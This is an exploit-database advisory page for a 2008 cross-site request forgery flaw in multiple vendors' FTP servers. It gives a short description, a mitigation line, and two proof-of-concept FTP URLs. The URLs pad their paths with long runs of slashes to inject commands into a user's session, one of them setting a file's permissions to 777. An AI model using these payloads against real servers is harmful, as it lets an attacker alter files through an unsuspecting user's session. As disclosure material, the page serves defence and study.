FTP Servers CSRF Vulnerability

vendor:

FTP Servers

by:

SecurityFocus

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: FTP Servers

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

FTP Servers CSRF Vulnerability

FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks. Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks.

Mitigation:

Implementing a secure authentication mechanism and validating user input can help mitigate this vulnerability.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31289/info

FTP servers by multiple vendors are prone to a security vulnerability that allows attackers to perform cross-site request-forgery attacks.

Successful exploits can run arbitrary FTP commands on the server in the context of an unsuspecting user's session. This may lead to further attacks. 

ftp://user@example.com////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////syst

ftp://ftp.example.com/////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////
/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE